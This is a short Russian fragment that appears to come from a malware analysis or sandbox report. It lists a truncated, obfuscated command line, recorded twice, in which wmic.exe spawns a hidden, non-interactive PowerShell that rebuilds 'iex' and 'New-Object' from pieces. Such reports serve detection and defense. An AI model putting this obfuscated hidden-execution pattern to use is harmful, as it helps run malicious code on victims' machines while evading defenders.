Техническая информация
- '<SYSTEM32>\wbem\wmic.exe' /node:"" "pRoCesS" 'CaLl' CReaTE "pOweRSHELL -Noni -W H -NoP .( $sHeLliD[1]+$SHelLId[13]+'X') ( "\".('s'+'al') ('Vu') ('n'+'e'+'w-obj'+'ect');&( `${VERbOSePrEFe`R`EN`cE}.tostrING()[1"\" ...
- '<SYSTEM32>\wbem\wmic.exe' /node:"" "pRoCesS" 'CaLl' CReaTE "pOweRSHELL -Noni -W H -NoP .( $sHeLliD[1]+$SHelLId[13]+'X') ( "\".('s'+'al') ('Vu') ('n'+'e'+'w-obj'+'ect');&( `${VERbOSePrEFe`R`EN`cE}.tostrING()[1"\" ...' (со скрытым окном)